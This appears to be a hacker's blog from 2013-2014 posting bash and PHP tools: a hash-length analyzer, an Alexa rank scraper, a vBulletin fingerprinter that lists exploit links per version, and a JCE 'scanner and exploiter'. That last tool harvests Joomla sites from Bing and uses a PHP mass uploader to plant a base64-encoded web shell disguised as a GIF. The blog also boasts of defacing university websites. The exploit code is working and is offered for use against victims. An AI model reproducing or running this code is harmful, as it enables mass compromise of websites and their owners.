#!/bin/bash
#
# ---------------------------------
# The Crows Crew Hash Analyzer
# Licence : Linux
# ---------------------------------
#
# Title : The Crows Crew Hash Analyzer
# Code : Bash
# Author : RedH4t.Viper
# Email : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com
# Date : 2013 17 May
# Thanks : IrIsT ,TBH ,3xp1r3 , thecrowscrew ,kurdhackteam
#
# Gr33tz : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Net.W0lf |
# Gr33tz : Skote_Vahshat| Dj.TiniVini| Mr.XHat | Black King |
# Gr33tz : E2MAEN | Mr.F@RDIN | M4st3r4N0nY | ICA_r00t | m3hdi |
# Gr33tz : x3o-1337 | Gabby | Sukhoi Su-37 | ARTA | H-SK33PY | (^_^) | Turk Sever |
# Gr33tz : Sajjad13and11 | Silent | Mr.Zero | Dr.Koderz | Smartprogrammer |
# Gr33tz : IR Anonymous | sole sad \ z3r0 | Medrik && All Of IrIsT Memebrz
#------------------------------------------------------------------------------------------#
m_hash=$1
n_hash=${#m_hash}
Usage()
{
echo ""
echo "# ****************************************************************************************************#"
echo "# Usage : The Crows Crew Hash Analyzer *#"
echo "# Help : -h && --help : Show This Menu *#"
echo "# RunScript : Give Permision to script and run it !! *#"
echo "# ****************************************************************************************************#"
echo ""
}
# check for arguments
if [ -z "$m_hash" ] || [ "$m_hash" == "-h" ] || [ "$m_hash" == "--help" ]; then
Usage;
exit
fi
Detect()
{
if [ $n_hash -eq 4 ]
then
echo "[*] This Hash Is CRC-16 Or CRC-16-CCITT Or FCS-16 ."
elif [ $n_hash -eq 8 ]
then
echo "[*] This Hash Is ADLER32 Or CRC-32 Or CRC-32B Or GHash-32-3 Or GHash-32-5 ."
elif [ $n_hash -eq 9 ]
then
echo "[*] This Hash Is Elf-32 ."
elif [ $n_hash -eq 13 ]
then
echo "[*] This Hash is DES (Unix) "
elif [ $n_hash -eq 16 ]
then
echo "[*] This Hash is MySQL < 5"
elif [ $n_hash -eq 24 ]
then
echo "[*] This Hash is RipeMD128 (Base64) Or SNEFRU128 (Base64) Or Tiger128 (Base64) Or Haval128 (Base64) Or MD2 (Base64) Or MD4(Base64) Or MD5 (Base64)"
elif [ $n_hash -eq 28 ]
then
echo "[*] This Hash is Haval160 (Base64) Or RipeMD160 (Base64) Or SHA-1 (Base64) Or Tiger160 (Base64) "
elif [ $n_hash -eq 32 ]
then
echo "[*] This Hash is DCC Or Haval128_3 Or Haval128_4 Or Haval128_5 Or Haval128 (HMAC) Or Haval192 (Base64) Or MD2 "
echo "[*] Or MD2 (HMAC) Or MD4 Or MD4 (HMAC) Or MD5 Or MD5 (HMAC) Or NTLM Or RipeMD128 Or RipeMD128 (HMAC) Or SNEFRU128"
echo "[*] Or SNEFRU128 (HMAC) Or Tiger128 Or Tiger128 (HMAC) Or Tiger192 (Base64) "
elif [ $n_hash -eq 34 ]
then
echo "[*] This Hash is MD5 (Unix) "
elif [ $n_hash -eq 37 ]
then
echo "[*] This Hash is MD5 (APR) "
elif [ $n_hash -eq 40 ]
then
echo "[*] This Hash is Haval160 Or Haval160_3 Or Haval160_4 Or Haval160_5 Or Haval160 (HMAC) Or Haval224 (Base64) "
echo "[*] Or MySQL v5.x Or SHA-0 Or SHA-1 Or SHA-1 (HMAC) Or SHA224 (Base64) Or Tiger160 Or Tiger160 (HMAC) Or "
elif [ $n_hash -eq 44 ]
then
echo "[*] This Hash is SNEFRU256 (Base64) Or Haval256 (Base64) Or RipeMD256 (Base64) Or SHA256 (Base64) "
elif [ $n_hash -eq 46 ]
then
echo "[*] This Hash is SHA-1(Django)"
elif [ $n_hash -eq 48 ]
then
echo "[*] This Hash is Tiger2 Or Tiger192 Or Tiger192 (HMAC) Or Haval192 Or Haval192_4 Or Haval195_5 Or Haval192 (HMAC) "
elif [ $n_hash -eq 56 ]
then
echo "[*] This Hash is Haval224 Or Haval244_3 Or Havan244_4 Or Haval224 Or RipeMD320 (Base64) Or SHA224 Or SHA224 (HMAC) "
elif [ $n_hash -eq 57 ]
then
echo "[*] This Hash is Snefru OR Gost "
elif [ $n_hash -eq 64 ]
then
echo "[*] This Hash is GOST R34.11-94 Or Haval256_5 Or Haval256 Or Haval256_3 Or Haval256_4 Or Haval256 (HMAC) Or Haval256_3 "
echo "[*] Or RipeMD256 Or RipeMD256 (HMAC) Or SHA256 Or SHA256 (HMAC) Or SHA384 (Base64) Or SNEFRU256 Or SNEFRU256 (HMAC) Or "
elif [ $n_hash -eq 96 ]
then
echo "[*] This Hash is SHA384 (HMAC) Or SHA384 "
elif [ $n_hash -eq 128 ]
then
echo "[*] This Hash is SHA512 Or SHA512 (HMAC) Or WHIRLPOO Or WHIRLPOOL (HMAC) "
elif [ $n_hash -eq 224 ]
then
echo "[*] This Hash is Haval-224 "
else
echo "[*] The Leanth of Input Hash is Not Correct . Plz Check Your Hash Leanth"
fi
}
Detect;
Friday, June 20, 2014
The Crows Crew Hash Analyzer
The Crows Crew Hash Analyzer
Tuesday, November 19, 2013
[V]bulletin Security Fingerprinter v1.0
Hi guys .
[V]bulletin Security Fingerprinter v1.0
#!/bin/bash
#
# VB-SFp - v1.0 [ public release ] - 240
#
# RHH - Vbulletin Security Fingerprinter
#
# Author: Red V!per
# Date: 2013 19 November
# Web: www.redhathackers.org
# E-mail: beni_vanda[at]yahoo[dot]com
#
#
TIME="0" # sleep time among each request
CURL="/usr/bin/curl"
GREP="/bin/grep"
CUT="/usr/bin/cut"
B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"
STRXPL="$B[+] EXPLOIT:$N"
Version=''
USER_AGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
url=$1
vbulletin=(
/archive/archive.css
/clientscript/vbulletin_ajax_htmlloader.js
/clientscript/vbulletin_ajax_imagereg.js
/clientscript/vbulletin_ajax_namesugg.js
/clientscript/vbulletin_ajax_nameverif.js
/clientscript/vbulletin_ajax_quote.js
/clientscript/vbulletin_ajax_reputation.js
/clientscript/vbulletin_ajax_search.js
/clientscript/vbulletin_ajax_taglist.js
/clientscript/vbulletin_ajax_tagsugg.js
/clientscript/vbulletin_ajax_threadrate.js
/clientscript/vbulletin_ajax_threadslist.js
/clientscript/vbulletin_ajax_userlist.js
/clientscript/vbulletin_ajax_wolresolve.js
/clientscript/vbulletin_album.js
/clientscript/vbulletin_attachment.js
/clientscript/vbulletin_backgroundpicker.js
/clientscript/vbulletin_colorpicker.js
/clientscript/vbulletin_cpcolorpicker.js
/clientscript/vbulletin_cphome_scripts.js
/clientscript/vbulletin_cpoptions_scripts.js
/clientscript/vbulletin_custom_profile.js
/clientscript/vbulletin_date_picker.css
/clientscript/vbulletin_date_picker.js
/clientscript/vbulletin_editor.css
/clientscript/vbulletin_global.js
/clientscript/vbulletin_group_read_marker.js
/clientscript/vbulletin_important.css
/clientscript/vbulletin_inlinemod.js
/clientscript/vbulletin_lightbox.js
/clientscript/vbulletin_md5.js
/clientscript/vbulletin_menu.js
/clientscript/vbulletin_multi_quote.js
/clientscript/vbulletin_notifications_nopopups.js
/clientscript/vbulletin_post_loader.js
/clientscript/vbulletin_profilefield_edit.js
/clientscript/vbulletin_quick_comment.js
/clientscript/vbulletin_quick_comment_generic.js
/clientscript/vbulletin_quick_edit_groupmessage.js
/clientscript/vbulletin_quick_edit_picturecomment.js
/clientscript/vbulletin_quick_edit_visitormessage.js
/clientscript/vbulletin_quick_reply.js
/clientscript/vbulletin_read_marker.js
/clientscript/vbulletin_settings_validate.js
/clientscript/vbulletin_tabctrl.css
/clientscript/vbulletin_tabctrl.js
/clientscript/vbulletin_tabctrl_rtl.css
/clientscript/vbulletin_templatemgr.js
/clientscript/vbulletin_textedit.js
/clientscript/vbulletin_thrdpostlist.js
/clientscript/vbulletin_quick_edit.js
/clientscript/vbulletin_quick_edit_generic.js
/cpstyles/vBulletin_2_Default/controlpanel.css
/cpstyles/vBulletin_3_Default/controlpanel.css
/cpstyles/vBulletin_3_Frontend/controlpanel.css
/cpstyles/vBulletin_3_Manual/controlpanel.css
/cpstyles/vBulletin_3_Silver/controlpanel.css
)
Banner()
{
echo -e '\E[32m'" "; tput sgr0
echo -e '\E[32m'" __ ______ ______ _ "; tput sgr0
echo -e '\E[32m'" \ \ / / _ \ | ____(_) "; tput sgr0
echo -e '\E[32m'" \ \ / /| |_) | | |__ _ _ __ __ _ ___ _ __ "; tput sgr0
echo -e '\E[32m'" \ \/ / | _ < | __| | | '_ \ / _\ |/ _ \ '__| "; tput sgr0
echo -e '\E[32m'" \ / | |_) | | | | | | | | (_| | __/ | "; tput sgr0
echo -e '\E[32m'" \/ |____/ |_|_ |_|_| |_|\__, |\___|_| "; tput sgr0
echo -e '\E[32m'" (_) | | __/ | "; tput sgr0
echo -e '\E[32m'" _ __ _ __ _ _ __ | |_ ___ _ __ |___/ "; tput sgr0
echo -e '\E[32m'" | '_ \| '__| | '_ \| __/ _ \ '__| "; tput sgr0
echo -e '\E[32m'" | |_) | | | | | | | || __/ | "; tput sgr0
echo -e '\E[32m'" | .__/|_| |_|_| |_|\__\___|_| "; tput sgr0
echo -e '\E[32m'" | | "; tput sgr0
echo -e '\E[32m'" |_| "; tput sgr0
echo -e
echo -e "$B -.-.-.-.-.-.-.-.-#-#-#-#-#-#-#-#-#-#-.-.-.-.-.-.-.- "
echo -e " - [V]bulletin Security Fingerprinter v1.0 -"
echo -e "-#-#-#-#- Cod3d By: Red V!per [wWw.RedHatHackers.org] -#-#-#-#-"
echo -e " - IN GOD WE TRUST -"
echo -e " -.-.-.-.-.-.-.-.-#-#-#-#-#-#-#-#-#-#-.-.-.-.-.-.-.- $N "
echo
}
Usage()
{
clear
echo
echo -e "$B VB-SFp - v1.0 [public] - 240\n"
echo -e " -=============================================-\n"
echo -e " <victim> ->$N URL to victim installed Vbulletin"
echo -e " example: http://www.victim.com/vb\n"
echo -e "\n Run:$B ./VB-SFp.sh <victim> $N\n"
exit 1
}
Check_Arguments()
{
if [ -z "$url" ] || [ "$url" == "-h" ] || [ "$url" == "--help" ]; then
Usage;
exit
fi
}
Check_Vbulletin_Version()
{
for arr in "${vbulletin[@]}"
do
Get_Version $arr
if [ ! -z "$Version" ];then
break;
fi
done
if [ -z "$Version" ]
then
echo -e "$B [~] Not Found Version :| "
read -p " [~] Please Give Version Manual : " Version
echo
fi
Fingerpirint
}
Fingerpirint()
{
echo -e "$B [*] Target :\e[1;35m $url \e[0m"
echo -e "$B [*] Version :\e[1;32m $Version [Ok] \e[0m"
echo
echo -e "$B [*] \e[1;32m Avaliable Exploits for\e[0m \e[1;35m$Version \e[0m:"
echo
if [[ $Version == 3.8.4 ]] || [[ $Version == 3.8.5 ]] ; then
echo -e " $STRXPL http://1337day.com/exploit/13911 (= 3.8.4 | 3.8.5)"
echo
fi
if [[ $Version == 3.8.6 ]]; then
echo -e " $STRXPL http://1337day.com/exploit/13459 (= 3.8.6 )"
echo
fi
if [[ $Version == 4.0.4 ]]; then
echo -e " $STRXPL http://1337day.com/exploit/13743 (= 4.0.4 )"
echo
fi
if [[ $Version == 4.0.8 ]]; then
echo -e " $STRXPL http://1337day.com/exploit/14877 (= 4.0.8 )"
echo
echo -e " $STRXPL http://1337day.com/exploit/14924 (= 4.0.8 PL1 )"
echo
fi
if [[ $Version == 3.6.8 ]] || [[ $Version == 3.7.* ]] ; then
echo -e " $STRXPL http://1337day.com/exploit/15531 (= 3.6.8| 3.7.x )"
echo
fi
if [[ $Version == 3.8.* ]]; then
echo -e " $STRXPL http://1337day.com/exploit/15549 (= 3.8.x )"
echo
fi
if [[ $Version == 3.1* ]]; then
echo -e " $STRXPL http://1337day.com/exploit/15822 (= 3.1x )"
echo
fi
res1=`expr $Version '<=' '4.1.3'`
res2=`expr $Version '>=' '4.0.*'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
echo -e " $STRXPL http://1337day.com/exploit/16548 ( 4.0.x => 4.1.3 )"
echo
fi
res1=`expr $Version '<=' '4.1.10'`
res2=`expr $Version '>=' '4.1.7'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
echo -e " $STRXPL http://1337day.com/exploit/17824 ( 4.1.7 => 4.1.10 )"
echo
fi
if [[ $Version == 3.*.* ]]; then
echo -e " $STRXPL http://1337day.com/exploit/18902 (= 3.x.x )"
echo
fi
if [[ $Version == 4.0.* ]]; then
echo -e " $STRXPL http://1337day.com/exploit/16160 (= 4.0.x )"
echo
fi
res1=`expr $Version '<=' '4.1.2'`
res2=`expr $Version '>=' '4.0.*'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
echo -e " $STRXPL http://1337day.com/exploit/16147 ( 4.0.x => 4.1.3 )"
echo
fi
if [[ $Version == 3.8.* ]] || [[ $Version == 4.*.* ]] ; then
echo -e " $STRXPL http://1337day.com/exploit/11737 (= 3.8.x|4.x.x )"
echo
echo -e " $STRXPL http://1337day.com/exploit/20984 (= 3.8.x|4.x.x )"
echo
fi
if [[ $Version == 4.0.2 ]]; then
echo -e " $STRXPL http://1337day.com/exploit/19293 (= 4.0.2 )"
echo
fi
if [[ $Version == 3.*.* ]] || [[ $Version == 4.*.* ]] ; then
echo -e " $STRXPL http://1337day.com/exploit/19677 (= 3.x.x|4.x.x )"
echo
fi
res1=`expr $Version '<=' '1.1.9'`
if [ $res1 -eq 1 ];
then
echo -e " $STRXPL http://1337day.com/exploit/19722 ( <= 1.1.9 )"
echo
fi
res1=`expr $Version '<=' '4.2.0'`
res2=`expr $Version '>=' '3.*.*'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
echo -e " $STRXPL http://1337day.com/exploit/19862 ( 3.x => 4.2.0 )"
echo
fi
if [[ $Version == 4.2.0 ]]; then
echo -e " $STRXPL http://1337day.com/exploit/19874 (= 4.2.0 )"
echo
fi
if [[ $Version == 5.0.0 ]]; then
echo -e " $STRXPL http://1337day.com/exploit/19956 (= 5.0.0 )"
echo
echo -e " $STRXPL http://1337day.com/exploit/description/20002 (= 5.0.0 )"
echo
echo -e " $STRXPL http://1337day.com/exploit/description/20403 (= 5.0.0 )"
echo
fi
if [[ $Version == 4.*.* ]] || [[ $Version == 5.*.* ]] ; then
echo -e " $STRXPL http://1337day.com/exploit/20983 (= 4.x.x|5.x.x )"
echo
echo -e " $STRXPL http://1337day.com/exploit/description/21518 (= 4.x.x|5.x.x )"
echo
fi
if [[ $Version == 3.8.* ]] || [[ $Version == 4.*.* ]] ; then
echo -e " $STRXPL http://1337day.com/exploit/20984 (= 3.8.x|4.x.x )"
echo
fi
if [[ $Version == 4.0.* ]]; then
echo -e " $STRXPL http://1337day.com/exploit/21029 (= 4.0.x )"
echo
fi
}
Get_Version()
{
req=`$CURL -silent -A $USER_AGENT "$url/$1"`
Version=`echo "$req" | egrep -o 'vBulletin [0-9][^b]+' | awk '{gsub("vBulletin ","")}1' |$CUT -d ' ' -f 1`
}
Check_Arguments;
Banner
Check_Vbulletin_Version;
Download : http://www.mediafire.com/download/58ssjy6uikt59qw/vb-fingerprinter.sh
Sunday, September 8, 2013
SAPIENZA UNIVERSITA DI ROMA WAS HACKED
http://www.th3mirror.com/mirror/id/435812/
http://zone-hc.com/archive/mirror/1e9bc13_w3.disg.uniroma1.it_mirror_.html
3CA Get Alexa Rank
insert your sites in alexa.lst file beside bash script and give permission to bash script (chmod +x script.sh) Then Run it (./script.sh)
#!/bin/bash
# 3CA Get Alexa Rank
# Usage : insert your sites in alexa.lst file beside bash script and give permission to bash script (chmod +x script.sh) Then Run it (./script.sh) !!
#Coded by : Red V!per
B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"
get_rank()
{
rm -rf alexa.php
wget -q --user-agent="Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" -O alexa.php "http://www.alexa.com/siteinfo/$1"
rank=`cat alexa.php | grep "Global rank" | cut -d '"' -f 5 | cut -d '>' -f 2 | cut -d '<' -f 1`
if [ ! -z "$rank" ] ; then
echo -e "$B[+] $1 \e[1;32m[$rank] \e[0m"
echo "$1 [$rank]" >> alexa_rank.lst
else
echo -e "$B[-] $1 \e[1;31m[-] \e[0m"
fi
rm -rf alexa.php
}
for alexa in `cat alexa.lst`
do
get_rank $alexa
done
Estudar em Lisboa && ISEC University Hacked
Estudar em Lisboa && ISEC University Hacked
http://zone-h.org/mirror/id/20735001
http://zone-h.org/mirror/id/20735008
Tuesday, August 27, 2013
Red V!per Server Jce Scanner && Exploiter
D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
insert jce.php beside bash script :
#!/bin/bash
# Jce Server Scanner && Exploiter
# Coded By : Red V!per
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
# Gr33tz : All Turkish && Persian Hacker
#--------------------------------------------------------------------------------------------------------------------
#
# Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com
# devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
#
#-------------------- Red V!per Banner ----------------------------------------------------------------------------
Banner()
{
clear
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" || || "; tput sgr0
echo -e '\E[34m'" ||\E[31m _____ _ __ ___ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | __ \ | | \ \ / / | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___ __| | \ \ / /| |_ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | _ // _ \/ _\ | \ \/ / | | '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \ __/ (_| | \ / |_| |_) | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \_\___|\__,_| \/ (_) .__/ \___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m (_) \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ ___ ___ ___ ___ __ _ _ __ _ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | | (_| __/ \__ \ (_| (_| | | | | | | | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
sleep 3
echo
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e " Server Jce Scanner && Exploiter"
echo
echo -e " BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [ INFO ] ===========-"
echo
read -p "[*] Target Ip : " IP
echo -e "$N"
}
#-------------------- Variables ----------------------------------------------------------------------------
B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"
#-------------------- Scanning Jce Targets on Server -------------------------------------------------------
scan_jce_on_victim()
{
page=0
how_many=1
single_page=
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"
wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `
cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php
let page=$page+1
done
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
for domain in `cat domains.txt`
do
GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
if [ $check -eq 0 ]
then
echo "www.$domain" > site.lst
php jce.php site.lst shells.lst
GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?
if [ $check2 -eq 0 ]
then
echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
else
echo "[-] www.$domain/ [No] "
fi
else
echo "[-] www.$domain/ [No] "
fi
done
rm -rf alldomain_bing.txt
rm -rf domains.txt
rm -rf site.lst
rm -rf shells.lst
}
#-------------------- Remove ------------------------------------------------------------------------
all_remove()
{
rm -rf alldomain_bing*
rm -rf domains_f*
rm -rf domains_f*
rm -rf domain_bing*
rm -rf alldomain_bing*
rm -rf domains*
rm -rf jce_server*
rm -rf site*
}
#-------------------- Main Brain :D ------------------------------------------------------------------------
main()
{
chmod +x jce.php
if [ ! -f shells.lst ]; then
touch shells.lst ;
fi
Banner;
all_remove;
scan_jce_on_victim;
}
main;
jce.php :
<?phpDownload Bash Script :http://www.mediafire.com/view/2rk5ikxu1k1kon3/jce-scanner-exploiter.sh
/*
# Mass Uploader
# Coded By Mua & Keresteci
# Recoded By Red V!per
*/
$kirilmis = 0;
$taranmis = 0;
error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 3);
function oku($link)
{
$site = parse_url($link);
$link = $site["path"];
$site = $site["host"];
$httpresponse = "";
$fp = fsockopen($site, 80, $err_num, $err_msg, 30);
if ($fp) {
fputs($fp, "GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");
fputs($fp, "Connection: close\n\n");
while (!feof($fp)) {
$http_response .= fgets($fp, 128);
}
fclose($fp);
}
return $http_response;
}
$dosya = $argv[1];
$kirilanlar = fopen($argv[2], 'w');
$okunan = file($dosya);
$toplam = count($okunan);
foreach ($okunan as $sira => $satir) {
$hatalisite = 0;
$satir = preg_replace("/[\\n\\r]+/", "", $satir);
$url = parse_url($satir);
if ($url["scheme"])
$host = $url["host"];
else {
$url = parse_url("http://" . $satir);
$host = $url["host"];
}
$packet = "Mua-Kontrol-Paketi-Panpa";
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
$content = "GIF89a1\n";
$content .= '<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>';
$data = "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data .= "/\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";
$data .= "Content-Type: image/gif\r\n\r\n";
$data .= "$content\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "0day\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$data .= "upload\r\n";
$data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
$packet = "POST " . $p . "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Proxy-Connection: close\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n\r\n\r\n\r\n";
$packet .= $data;
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
$packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "User-Agent: Mua \r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-US,en;q=0.8\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
$packet .= "Accept-Encoding: deflate\n";
$packet .= "X-Request: JSON\r\n";
$packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
$ren = "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";
$packet .= "Content-Length: " . strlen($ren) . "\r\n\r\n";
$packet .= $ren . "\r\n\r\n";
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
$taranmis = $taranmis + 1;
$kod = oku("http://" . $host . "/images/stories/vanda.php");
$pozisyon = strpos($kod, "GIF89a1");
if ($pozisyon == true) {
$kirilmis = $kirilmis + 1;
fwrite($kirilanlar, "http://" . $host . "/images/stories/vanda.php\r\n");
}
} //for each
fclose($yaz);
fclose($kirilanlar);
Download jce.php : http://www.mediafire.com/view/p8210ab5d0duj9y/jce.php
Friday, August 23, 2013
Server Jce Scanner
D3m00 : http://www.mediafire.com/download/04357l3y8t8cerv/jce-scanner%282%29.mp4
#!/bin/bash
# Jce Server Scanner
# Coded By : Red V!per
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/04357l3y8t8cerv/jce-scanner%282%29.mp4
# Tnx 2 : All Turkish && Persian Hacker
#-------------------- Red V!per Banner ----------------------------------------------------------------------------
Banner()
{
clear
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
